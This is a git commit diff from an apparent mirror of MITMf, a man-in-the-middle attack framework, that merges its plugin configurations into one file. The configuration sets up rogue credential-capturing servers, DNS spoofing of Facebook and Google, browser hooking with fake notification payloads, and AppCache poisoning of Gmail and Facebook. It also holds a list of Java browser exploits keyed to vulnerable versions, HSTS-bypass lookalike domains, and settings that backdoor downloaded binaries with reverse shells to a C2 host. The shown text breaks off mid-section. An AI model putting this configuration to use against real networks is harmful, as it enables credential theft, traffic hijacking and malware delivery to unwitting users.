mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-14 09:03:49 -07:00
- All config files now consolidated into a single file
- Added 'args' option in config file - HSTS bypass is now a plugin (SSLstrip+) - SMBAuth now defaults to specified interface IP if --host is not passed - Modified plugins for new config support - Changed appoison and responder plugin for ConfigObj library support - Minor visual argparse changes - Slapped santa on the head with a trout - Gave rudolf a new nose
This commit is contained in:
parent
f359ee7cdd
commit
846f85426c
24 changed files with 531 additions and 436 deletions
|
@ -9,6 +9,7 @@ This tool is completely based on sergio-proxy https://code.google.com/p/sergio-p
|
||||||
|
|
||||||
Availible plugins:
|
Availible plugins:
|
||||||
- Responder - LLMNR, NBT-NS and MDNS poisoner
|
- Responder - LLMNR, NBT-NS and MDNS poisoner
|
||||||
|
- SSLstrip+ - Partially bypass HSTS
|
||||||
- Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries
|
- Spoof - Redirect traffic using ARP Spoofing, ICMP Redirects or DHCP Spoofing and modify DNS queries
|
||||||
- BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type
|
- BeEFAutorun - Autoruns BeEF modules based on clients OS or browser type
|
||||||
- AppCachePoison - Perform app cache poison attacks
|
- AppCachePoison - Perform app cache poison attacks
|
||||||
|
|
|
@ -1,53 +0,0 @@
|
||||||
[DEFAULT]
|
|
||||||
; HTML5 AppCache poisioning attack
|
|
||||||
; see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
|
|
||||||
; generic settings for tampering engine
|
|
||||||
|
|
||||||
templates_path=config/app_cache_poison_templates
|
|
||||||
;enable_only_in_useragents=Chrome|Firefox
|
|
||||||
|
|
||||||
; when visiting first url matching following expression we will embed iframes with all tamper URLs
|
|
||||||
;(to poison the cache for all of them all at once)
|
|
||||||
mass_poison_url_match=http://.*prezydent\.pl.*
|
|
||||||
; it's only useful to mass poison chrome because:
|
|
||||||
; - it supports iframe sandbox preventing framebusting
|
|
||||||
; - does not ask for confirmation
|
|
||||||
mass_poison_useragent_match=Chrome|Safari
|
|
||||||
|
|
||||||
[test]
|
|
||||||
; any //example.com URL redirects to iana and will display our spoofed content
|
|
||||||
tamper_url=http://example.com/
|
|
||||||
manifest_url=http://www.iana.org/robots.txt ;use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
|
|
||||||
templates=test ; which templates to use for spoofing content?
|
|
||||||
skip_in_mass_poison=1
|
|
||||||
|
|
||||||
; use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
|
|
||||||
[gmail]
|
|
||||||
tamper_url=http://mail.google.com/mail/
|
|
||||||
; manifest has to be of last domain in redirect loop
|
|
||||||
manifest_url=http://mail.google.com/robots.txt
|
|
||||||
templates=default ; could be omitted
|
|
||||||
|
|
||||||
[facebook]
|
|
||||||
tamper_url=http://www.facebook.com/
|
|
||||||
manifest_url=http://www.facebook.com/robots.txt
|
|
||||||
templates=facebook ; use different template
|
|
||||||
|
|
||||||
[twitter]
|
|
||||||
tamper_url=http://twitter.com/
|
|
||||||
;tamper_url_match=^http://(www\.)?twitter\.com/$
|
|
||||||
manifest_url=http://twitter.com/robots.txt
|
|
||||||
|
|
||||||
[testing]
|
|
||||||
tamper_url=http://www.html5rocks.com/en/
|
|
||||||
manifest_url=http://www.html5rocks.com/robots.txt
|
|
||||||
|
|
||||||
; we can also modify non-HTML URLs to append malicious code to them
|
|
||||||
; but for them to be cached in HTML5 AppCache they need to be referred in
|
|
||||||
; manifest for a poisoned domain
|
|
||||||
; if not, they are "only" cached for 10 years :D
|
|
||||||
[ga]
|
|
||||||
raw_url=http://www.google-analytics.com/ga.js
|
|
||||||
templates=script
|
|
||||||
skip_in_mass_poison=1
|
|
||||||
;you can add other scripts in additional sections like jQuery etc.
|
|
|
@ -1,32 +0,0 @@
|
||||||
#Example config file for the BeefAutorun plugin
|
|
||||||
|
|
||||||
mode = oneshot
|
|
||||||
#can be set to loop, or oneshot
|
|
||||||
|
|
||||||
#in loop mode the plugin will run modules on all hooked browsers every 10 seconds
|
|
||||||
#in oneshot mode the plugin will run modules only once per hooked browser
|
|
||||||
|
|
||||||
[ALL] #Runs specified modules on all hooked browsers
|
|
||||||
|
|
||||||
'Man-In-The-Browser'= '{}'
|
|
||||||
|
|
||||||
|
|
||||||
[targets] #Runs specified modules based on OS and Browser type
|
|
||||||
|
|
||||||
[[Windows]] #Target all Windows versions using Firefox and Internet Explorer
|
|
||||||
|
|
||||||
[[[FF]]]
|
|
||||||
'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'
|
|
||||||
|
|
||||||
[[[IE]]]
|
|
||||||
'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}'
|
|
||||||
|
|
||||||
[[Windows 7]] #Target only Windows 7 using Chrome
|
|
||||||
|
|
||||||
[[[C]]]
|
|
||||||
'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}'
|
|
||||||
|
|
||||||
[[Linux]] #Target Linux platforms using Chrome
|
|
||||||
|
|
||||||
[[[C]]]
|
|
||||||
'Redirect Browser (Rickroll)' = '{}'
|
|
|
@ -1,4 +0,0 @@
|
||||||
#Example config file for DHCP spoofing
|
|
||||||
ip_pool = 192.168.2.10-50
|
|
||||||
subnet = 255.255.255.0
|
|
||||||
dns_server = 192.168.2.20 #optional
|
|
|
@ -1,3 +0,0 @@
|
||||||
#Example config file for DNS tampering
|
|
||||||
www.facebook.com = 192.168.10.1
|
|
||||||
google.com = 192.168.10.1
|
|
|
@ -1,122 +0,0 @@
|
||||||
"""
|
|
||||||
BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
|
||||||
|
|
||||||
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
|
||||||
|
|
||||||
Copyright (c) 2013-2014, Joshua Pitts
|
|
||||||
All rights reserved.
|
|
||||||
|
|
||||||
Redistribution and use in source and binary forms, with or without modification,
|
|
||||||
are permitted provided that the following conditions are met:
|
|
||||||
|
|
||||||
1. Redistributions of source code must retain the above copyright notice,
|
|
||||||
this list of conditions and the following disclaimer.
|
|
||||||
|
|
||||||
2. Redistributions in binary form must reproduce the above copyright notice,
|
|
||||||
this list of conditions and the following disclaimer in the documentation
|
|
||||||
and/or other materials provided with the distribution.
|
|
||||||
|
|
||||||
3. Neither the name of the copyright holder nor the names of its contributors
|
|
||||||
may be used to endorse or promote products derived from this software without
|
|
||||||
specific prior written permission.
|
|
||||||
|
|
||||||
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
|
||||||
AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
|
||||||
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
|
||||||
ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
|
||||||
LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
|
||||||
CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
|
||||||
SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
|
||||||
INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
|
||||||
CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
|
||||||
ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
|
||||||
POSSIBILITY OF SUCH DAMAGE.
|
|
||||||
|
|
||||||
Tested on Kali-Linux.
|
|
||||||
|
|
||||||
"""
|
|
||||||
|
|
||||||
[ZIP]
|
|
||||||
# patchCount is the max number of files to patch in a zip file
|
|
||||||
# After the max is reached it will bypass the rest of the files
|
|
||||||
# and send on it's way
|
|
||||||
|
|
||||||
patchCount = 5
|
|
||||||
|
|
||||||
# In Bytes
|
|
||||||
maxSize = 40000000
|
|
||||||
|
|
||||||
blacklist = .dll, #don't do dlls in a zip file
|
|
||||||
|
|
||||||
[TAR]
|
|
||||||
# patchCount is the max number of files to patch in a tar file
|
|
||||||
# After the max is reached it will bypass the rest of the files
|
|
||||||
# and send on it's way
|
|
||||||
|
|
||||||
patchCount = 5
|
|
||||||
|
|
||||||
# In Bytes
|
|
||||||
maxSize = 40000000
|
|
||||||
|
|
||||||
blacklist = , # a comma is null do not leave blank
|
|
||||||
|
|
||||||
[targets]
|
|
||||||
#MAKE SURE that your settings for host and port DO NOT
|
|
||||||
# overlap between different types of payloads
|
|
||||||
|
|
||||||
[[ALL]] # DEFAULT settings for all targets REQUIRED
|
|
||||||
|
|
||||||
LinuxType = ALL # choices: x86/x64/ALL/None
|
|
||||||
WindowsType = ALL # choices: x86/x64/ALL/None
|
|
||||||
FatPriority = x64 # choices: x86 or x64
|
|
||||||
|
|
||||||
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
|
|
||||||
|
|
||||||
CompressedFiles = True #True/False
|
|
||||||
[[[LinuxIntelx86]]]
|
|
||||||
SHELL = reverse_shell_tcp # This is the BDF syntax
|
|
||||||
HOST = 192.168.1.168 # The C2
|
|
||||||
PORT = 8888
|
|
||||||
SUPPLIED_SHELLCODE = None
|
|
||||||
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
|
|
||||||
|
|
||||||
[[[LinuxIntelx64]]]
|
|
||||||
SHELL = reverse_shell_tcp
|
|
||||||
HOST = 192.168.1.16
|
|
||||||
PORT = 9999
|
|
||||||
SUPPLIED_SHELLCODE = None
|
|
||||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
|
||||||
|
|
||||||
[[[WindowsIntelx86]]]
|
|
||||||
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
|
|
||||||
HOST = 192.168.1.16
|
|
||||||
PORT = 8443
|
|
||||||
SHELL = reverse_shell_tcp
|
|
||||||
SUPPLIED_SHELLCODE = None
|
|
||||||
ZERO_CERT = False
|
|
||||||
PATCH_DLL = True
|
|
||||||
MSFPAYLOAD = windows/shell_reverse_tcp
|
|
||||||
|
|
||||||
[[[WindowsIntelx64]]]
|
|
||||||
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
|
||||||
HOST = 192.168.1.16
|
|
||||||
PORT = 8088
|
|
||||||
SHELL = reverse_shell_tcp
|
|
||||||
SUPPLIED_SHELLCODE = Nonepatchpatchpatch
|
|
||||||
ZERO_CERT = True
|
|
||||||
PATCH_DLL = False
|
|
||||||
MSFPAYLOAD = windows/x64/shell_reverse_tcp
|
|
||||||
|
|
||||||
[[[MachoIntelx86]]]
|
|
||||||
SHELL = reverse_shell_tcp
|
|
||||||
HOST = 192.168.1.16
|
|
||||||
PORT = 4444
|
|
||||||
SUPPLIED_SHELLCODE = None
|
|
||||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
|
||||||
|
|
||||||
[[[MachoIntelx64]]]
|
|
||||||
SHELL = reverse_shell_tcp
|
|
||||||
HOST = 192.168.1.16
|
|
||||||
PORT = 5555
|
|
||||||
SUPPLIED_SHELLCODE = None
|
|
||||||
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
|
|
@ -1,11 +0,0 @@
|
||||||
#here you can configure your domains to bypass HSTS on
|
|
||||||
#the format is real.domain.com = fake.domain.com
|
|
||||||
|
|
||||||
#for google and gmail
|
|
||||||
accounts.google.com = account.google.com
|
|
||||||
mail.google.com = gmail.google.com
|
|
||||||
accounts.google.se = cuentas.google.se
|
|
||||||
|
|
||||||
#for facebook
|
|
||||||
www.facebook.com = social.facebook.com
|
|
||||||
facebook.com = social.facebook.com
|
|
|
@ -1,27 +0,0 @@
|
||||||
# All versions strings without a * are considered vulnerable if clients Java version is <= update version
|
|
||||||
# When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
|
|
||||||
|
|
||||||
[Multi] #Cross platform exploits, yay java! <3
|
|
||||||
|
|
||||||
multi/browser/java_rhino = 1.6.0.28, 1.7.0.28
|
|
||||||
multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16
|
|
||||||
multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26
|
|
||||||
multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2
|
|
||||||
multi/browser/java_jre17_exec = 1.7.0.6
|
|
||||||
multi/browser/java_jre17_jaxws = 1.7.0.7
|
|
||||||
multi/browser/java_jre17_jmxbean = 1.7.0.10
|
|
||||||
multi/browser/java_jre17_jmxbean_2 = 1.7.0.11
|
|
||||||
multi/browser/java_jre17_reflection_types = 1.7.0.17
|
|
||||||
multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37
|
|
||||||
multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7
|
|
||||||
multi/browser/java_jre17_method_handle = 1.7.0.7
|
|
||||||
multi/browser/java_jre17_driver_manager = 1.7.0.17
|
|
||||||
multi/browser/java_jre17_provider_skeleton = 1.7.0.21
|
|
||||||
multi/browser/java_storeimagearray = 1.7.0.21
|
|
||||||
multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11
|
|
||||||
|
|
||||||
[Windows] #These are windows specific
|
|
||||||
|
|
||||||
windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7
|
|
||||||
windows/browser/java_cmm = 1.6.0.41, 1.7.0.15
|
|
||||||
windows/browser/java_mixer_sequencer = 1.6.0.18
|
|
363
config/mitmf.cfg
363
config/mitmf.cfg
|
@ -1,10 +1,355 @@
|
||||||
[BeEF]
|
#MITMf configuration
|
||||||
beefip = 127.0.0.1
|
|
||||||
beefport = 3000
|
|
||||||
user = beef
|
|
||||||
pass = beef
|
|
||||||
|
|
||||||
[Metasploit]
|
[MITMf]
|
||||||
msfport = 8080 #Port to start webserver for exploits
|
|
||||||
rpcip = 127.0.0.1
|
#here you can set the arguments to pass to MITMf when it starts so all you need to do is run ```python mitmf.py``` (assuming you config file is in the default directory)
|
||||||
rpcpass = abc123
|
args=''
|
||||||
|
|
||||||
|
#Required BeEF and Metasploit options
|
||||||
|
[[BeEF]]
|
||||||
|
beefip = 127.0.0.1
|
||||||
|
beefport = 3000
|
||||||
|
user = beef
|
||||||
|
pass = beef
|
||||||
|
|
||||||
|
[[Metasploit]]
|
||||||
|
msfport = 8080 #Port to start webserver for exploits
|
||||||
|
rpcip = 127.0.0.1
|
||||||
|
rpcpass = abc123
|
||||||
|
|
||||||
|
#-----------------------------------------------------------------------------------------------------------------------------------------#
|
||||||
|
|
||||||
|
#Plugin configuration starts here
|
||||||
|
|
||||||
|
[Spoof]
|
||||||
|
|
||||||
|
[[DHCP]]
|
||||||
|
ip_pool = 192.168.2.10-50
|
||||||
|
subnet = 255.255.255.0
|
||||||
|
dns_server = 192.168.2.20 #optional
|
||||||
|
|
||||||
|
[[DNS]]
|
||||||
|
www.facebook.com = 192.168.10.1
|
||||||
|
google.com = 192.168.10.1
|
||||||
|
|
||||||
|
|
||||||
|
[Responder]
|
||||||
|
|
||||||
|
#Set these values to On or Off, so you can control which rogue authentication server is turned on.
|
||||||
|
SQL = On
|
||||||
|
SMB = On
|
||||||
|
Kerberos = On
|
||||||
|
FTP = On
|
||||||
|
POP = On
|
||||||
|
##Listen on 25/TCP, 587/TCP
|
||||||
|
SMTP = On
|
||||||
|
IMAP = On
|
||||||
|
HTTP = On
|
||||||
|
HTTPS = On
|
||||||
|
DNS = On
|
||||||
|
LDAP = On
|
||||||
|
|
||||||
|
#Set a custom challenge
|
||||||
|
Challenge = 1122334455667788
|
||||||
|
|
||||||
|
#Set this to change the default logging file
|
||||||
|
SessionLog = Responder-Session.log
|
||||||
|
|
||||||
|
#Set this option with your in-scope targets (default = All). Example: RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
||||||
|
#RespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
||||||
|
RespondTo =
|
||||||
|
#Set this option with specific NBT-NS/LLMNR names to answer to (default = All). Example: RespondTo = WPAD,DEV,PROD,SQLINT
|
||||||
|
#RespondTo = WPAD,DEV,PROD,SQLINT
|
||||||
|
RespondToName =
|
||||||
|
|
||||||
|
#DontRespondTo = 10.20.1.116,10.20.1.117,10.20.1.118,10.20.1.119
|
||||||
|
DontRespondTo =
|
||||||
|
#Set this option with specific NBT-NS/LLMNR names not to respond to (default = None). Example: DontRespondTo = NAC, IPS, IDS
|
||||||
|
DontRespondToName =
|
||||||
|
|
||||||
|
[[HTTP Server]]
|
||||||
|
|
||||||
|
#Set this to On if you want to always serve a specific file to the victim.
|
||||||
|
Serve-Always = Off
|
||||||
|
|
||||||
|
#Set this to On if you want to serve an executable file each time a .exe is detected in an URL.
|
||||||
|
Serve-Exe = Off
|
||||||
|
|
||||||
|
#Uncomment and specify a custom file to serve, the file must exist.
|
||||||
|
Filename = config/responder/Denied.html
|
||||||
|
|
||||||
|
#Specify a custom executable file to serve, the file must exist.
|
||||||
|
ExecFilename = config/responder/FixInternet.exe
|
||||||
|
|
||||||
|
#Set your custom PAC script
|
||||||
|
WPADScript = 'function FindProxyForURL(url, host){if ((host == "localhost") || shExpMatch(host, "localhost.*") ||(host == "127.0.0.1") || isPlainHostName(host)) return "DIRECT"; if (dnsDomainIs(host, "RespProxySrv")||shExpMatch(host, "(*.RespProxySrv|RespProxySrv)")) return "DIRECT"; return "PROXY ISAProxySrv:3141; DIRECT";}'
|
||||||
|
|
||||||
|
[[HTTPS Server]]
|
||||||
|
|
||||||
|
#Change to use your certs
|
||||||
|
cert = config/responder/certs/responder.crt
|
||||||
|
key = config/responder/certs/responder.key
|
||||||
|
|
||||||
|
|
||||||
|
[BeEFAutorun]
|
||||||
|
#Example config for the BeefAutorun plugin
|
||||||
|
|
||||||
|
mode = oneshot
|
||||||
|
#can be set to loop, or oneshot
|
||||||
|
|
||||||
|
#in loop mode the plugin will run modules on all hooked browsers every 10 seconds
|
||||||
|
#in oneshot mode the plugin will run modules only once per hooked browser
|
||||||
|
|
||||||
|
[[ALL]] #Runs specified modules on all hooked browsers
|
||||||
|
|
||||||
|
'Man-In-The-Browser'= '{}'
|
||||||
|
|
||||||
|
[[targets]] #Runs specified modules based on OS and Browser type
|
||||||
|
|
||||||
|
[[[Windows]]] #Target all Windows versions using Firefox and Internet Explorer
|
||||||
|
|
||||||
|
[[[[FF]]]]
|
||||||
|
'Fake Notification Bar (Firefox)' = '{"url": "http://example.com/payload", "notification_text": "Click this if you dare"}'
|
||||||
|
|
||||||
|
[[[[IE]]]]
|
||||||
|
'Fake Notification Bar (IE)' = '{"notification_text": "Click this if you dare"}'
|
||||||
|
|
||||||
|
[[[Windows 7]]] #Target only Windows 7 using Chrome
|
||||||
|
|
||||||
|
[[[[C]]]]
|
||||||
|
'Fake Notification Bar (Chrome)' = '{"url": "http://example.com/payload", "notification_text: "Click this if you dare"}'
|
||||||
|
|
||||||
|
[[[Linux]]] #Target Linux platforms using Chrome
|
||||||
|
|
||||||
|
[[[[C]]]]
|
||||||
|
'Redirect Browser (Rickroll)' = '{}'
|
||||||
|
|
||||||
|
[AppCachePoison]
|
||||||
|
# HTML5 AppCache poisioning attack
|
||||||
|
# see http://blog.kotowicz.net/2010/12/squid-imposter-phishing-websites.html for description of the attack.
|
||||||
|
# generic settings for tampering engine
|
||||||
|
|
||||||
|
#enable_only_in_useragents=Chrome|Firefox
|
||||||
|
|
||||||
|
templates_path=config/app_cache_poison_templates
|
||||||
|
|
||||||
|
# when visiting first url matching following expression we will embed iframes with all tamper URLs
|
||||||
|
#(to poison the cache for all of them all at once)
|
||||||
|
|
||||||
|
mass_poison_url_match=http://.*prezydent\.pl.*
|
||||||
|
|
||||||
|
# it's only useful to mass poison chrome because:
|
||||||
|
# - it supports iframe sandbox preventing framebusting
|
||||||
|
# - does not ask for confirmation
|
||||||
|
|
||||||
|
mass_poison_useragent_match=Chrome|Safari
|
||||||
|
|
||||||
|
[[test]]
|
||||||
|
# any //example.com URL redirects to iana and will display our spoofed content
|
||||||
|
|
||||||
|
tamper_url=http://example.com/
|
||||||
|
manifest_url=http://www.iana.org/robots.txt #use existing static URL that is rarely seen by the browser user, but exists on the server (no 404!)
|
||||||
|
templates=test # which templates to use for spoofing content?
|
||||||
|
skip_in_mass_poison=1
|
||||||
|
|
||||||
|
[[gmail]]
|
||||||
|
#use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
|
||||||
|
|
||||||
|
tamper_url=http://mail.google.com/mail/
|
||||||
|
|
||||||
|
# manifest has to be of last domain in redirect loop
|
||||||
|
|
||||||
|
manifest_url=http://mail.google.com/robots.txt
|
||||||
|
templates=default # could be omitted
|
||||||
|
|
||||||
|
[[facebook]]
|
||||||
|
tamper_url=http://www.facebook.com/
|
||||||
|
manifest_url=http://www.facebook.com/robots.txt
|
||||||
|
templates=facebook # use different template
|
||||||
|
|
||||||
|
[[twitter]]
|
||||||
|
tamper_url=http://twitter.com/
|
||||||
|
#tamper_url_match=^http://(www\.)?twitter\.com/$
|
||||||
|
manifest_url=http://twitter.com/robots.txt
|
||||||
|
|
||||||
|
[[testing]]
|
||||||
|
tamper_url=http://www.html5rocks.com/en/
|
||||||
|
manifest_url=http://www.html5rocks.com/robots.txt
|
||||||
|
|
||||||
|
[[ga]]
|
||||||
|
# we can also modify non-HTML URLs to append malicious code to them
|
||||||
|
# but for them to be cached in HTML5 AppCache they need to be referred in
|
||||||
|
# manifest for a poisoned domain
|
||||||
|
# if not, they are "only" cached for 10 years :D
|
||||||
|
|
||||||
|
raw_url=http://www.google-analytics.com/ga.js
|
||||||
|
templates=script
|
||||||
|
skip_in_mass_poison=1
|
||||||
|
#you can add other scripts in additional sections like jQuery etc.
|
||||||
|
|
||||||
|
[JavaPwn]
|
||||||
|
# All versions strings without a * are considered vulnerable if clients Java version is <= update version
|
||||||
|
# When adding more exploits remember the following format: version string (eg 1.6.0) + update version (eg 28) = 1.6.0.28
|
||||||
|
|
||||||
|
[[Multi]] #Cross platform exploits, yay java! <3
|
||||||
|
|
||||||
|
multi/browser/java_rhino = 1.6.0.28, 1.7.0.28
|
||||||
|
multi/browser/java_calendar_deserialize = 1.6.0.10, 1.5.0.16
|
||||||
|
multi/browser/java_getsoundbank_bof = 1.6.0.16, 1.5.0.21, 1.4.2.23, 1.3.1.26
|
||||||
|
multi/browser/java_atomicreferencearray = 1.6.0.30, 1.5.0.33, 1.7.0.2
|
||||||
|
multi/browser/java_jre17_exec = 1.7.0.6
|
||||||
|
multi/browser/java_jre17_jaxws = 1.7.0.7
|
||||||
|
multi/browser/java_jre17_jmxbean = 1.7.0.10
|
||||||
|
multi/browser/java_jre17_jmxbean_2 = 1.7.0.11
|
||||||
|
multi/browser/java_jre17_reflection_types = 1.7.0.17
|
||||||
|
multi/browser/java_verifier_field_access = 1.7.0.4, 1.6.0.32, 1.5.0.35, 1.4.2.37
|
||||||
|
multi/browser/java_jre17_glassfish_averagerangestatisticimpl = 1.7.0.7
|
||||||
|
multi/browser/java_jre17_method_handle = 1.7.0.7
|
||||||
|
multi/browser/java_jre17_driver_manager = 1.7.0.17
|
||||||
|
multi/browser/java_jre17_provider_skeleton = 1.7.0.21
|
||||||
|
multi/browser/java_storeimagearray = 1.7.0.21
|
||||||
|
multi/browser/java_setdifficm_bof = *1.6.0.16, *1.6.0.11
|
||||||
|
|
||||||
|
[[Windows]] #These are windows specific
|
||||||
|
|
||||||
|
windows/browser/java_ws_double_quote = 1.6.0.35, 1.7.0.7
|
||||||
|
windows/browser/java_cmm = 1.6.0.41, 1.7.0.15
|
||||||
|
windows/browser/java_mixer_sequencer = 1.6.0.18
|
||||||
|
|
||||||
|
[SSLstrip+]
|
||||||
|
#here you can configure your domains to bypass HSTS on
|
||||||
|
#the format is real.domain.com = fake.domain.com
|
||||||
|
|
||||||
|
#for google and gmail
|
||||||
|
accounts.google.com = account.google.com
|
||||||
|
mail.google.com = gmail.google.com
|
||||||
|
accounts.google.se = cuentas.google.se
|
||||||
|
|
||||||
|
#for facebook
|
||||||
|
www.facebook.com = social.facebook.com
|
||||||
|
facebook.com = social.facebook.com
|
||||||
|
|
||||||
|
#-----------------------------------------------------------------------------------------------------------------------------------------#
|
||||||
|
|
||||||
|
# BackdoorFactory Proxy (BDFProxy) v0.2 - 'Something Something'
|
||||||
|
#
|
||||||
|
# Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
|
||||||
|
#
|
||||||
|
# Copyright (c) 2013-2014, Joshua Pitts
|
||||||
|
# All rights reserved.
|
||||||
|
#
|
||||||
|
# Redistribution and use in source and binary forms, with or without modification,
|
||||||
|
# are permitted provided that the following conditions are met:
|
||||||
|
#
|
||||||
|
# 1. Redistributions of source code must retain the above copyright notice,
|
||||||
|
# this list of conditions and the following disclaimer.
|
||||||
|
#
|
||||||
|
# 2. Redistributions in binary form must reproduce the above copyright notice,
|
||||||
|
# this list of conditions and the following disclaimer in the documentation
|
||||||
|
# and/or other materials provided with the distribution.
|
||||||
|
#
|
||||||
|
# 3. Neither the name of the copyright holder nor the names of its contributors
|
||||||
|
# may be used to endorse or promote products derived from this software without
|
||||||
|
# specific prior written permission.
|
||||||
|
#
|
||||||
|
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
|
||||||
|
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
|
||||||
|
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
|
||||||
|
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
|
||||||
|
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
|
||||||
|
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
|
||||||
|
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
|
||||||
|
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
|
||||||
|
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
|
||||||
|
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
|
||||||
|
# POSSIBILITY OF SUCH DAMAGE.
|
||||||
|
#
|
||||||
|
# Tested on Kali-Linux.
|
||||||
|
|
||||||
|
#-----------------------------------------------------------------------------------------------------------------------------------------#
|
||||||
|
|
||||||
|
[FilePwn]
|
||||||
|
[[ZIP]]
|
||||||
|
# patchCount is the max number of files to patch in a zip file
|
||||||
|
# After the max is reached it will bypass the rest of the files
|
||||||
|
# and send on it's way
|
||||||
|
|
||||||
|
patchCount = 5
|
||||||
|
|
||||||
|
# In Bytes
|
||||||
|
maxSize = 40000000
|
||||||
|
|
||||||
|
blacklist = .dll, #don't do dlls in a zip file
|
||||||
|
|
||||||
|
[[TAR]]
|
||||||
|
# patchCount is the max number of files to patch in a tar file
|
||||||
|
# After the max is reached it will bypass the rest of the files
|
||||||
|
# and send on it's way
|
||||||
|
|
||||||
|
patchCount = 5
|
||||||
|
|
||||||
|
# In Bytes
|
||||||
|
maxSize = 40000000
|
||||||
|
|
||||||
|
blacklist = , # a comma is null do not leave blank
|
||||||
|
|
||||||
|
[[targets]]
|
||||||
|
#MAKE SURE that your settings for host and port DO NOT
|
||||||
|
# overlap between different types of payloads
|
||||||
|
|
||||||
|
[[[ALL]]] # DEFAULT settings for all targets REQUIRED
|
||||||
|
|
||||||
|
LinuxType = ALL # choices: x86/x64/ALL/None
|
||||||
|
WindowsType = ALL # choices: x86/x64/ALL/None
|
||||||
|
FatPriority = x64 # choices: x86 or x64
|
||||||
|
|
||||||
|
FileSizeMax = 60000000 # ~60 MB (just under) No patching of files this large
|
||||||
|
|
||||||
|
CompressedFiles = True #True/False
|
||||||
|
[[[[LinuxIntelx86]]]]
|
||||||
|
SHELL = reverse_shell_tcp # This is the BDF syntax
|
||||||
|
HOST = 192.168.1.168 # The C2
|
||||||
|
PORT = 8888
|
||||||
|
SUPPLIED_SHELLCODE = None
|
||||||
|
MSFPAYLOAD = linux/x86/shell_reverse_tcp # MSF syntax
|
||||||
|
|
||||||
|
[[[[LinuxIntelx64]]]]
|
||||||
|
SHELL = reverse_shell_tcp
|
||||||
|
HOST = 192.168.1.16
|
||||||
|
PORT = 9999
|
||||||
|
SUPPLIED_SHELLCODE = None
|
||||||
|
MSFPAYLOAD = linux/x64/shell_reverse_tcp
|
||||||
|
|
||||||
|
[[[[WindowsIntelx86]]]]
|
||||||
|
PATCH_TYPE = SINGLE #JUMP/SINGLE/APPEND
|
||||||
|
HOST = 192.168.1.16
|
||||||
|
PORT = 8443
|
||||||
|
SHELL = reverse_shell_tcp
|
||||||
|
SUPPLIED_SHELLCODE = None
|
||||||
|
ZERO_CERT = False
|
||||||
|
PATCH_DLL = True
|
||||||
|
MSFPAYLOAD = windows/shell_reverse_tcp
|
||||||
|
|
||||||
|
[[[[WindowsIntelx64]]]]
|
||||||
|
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
|
||||||
|
HOST = 192.168.1.16
|
||||||
|
PORT = 8088
|
||||||
|
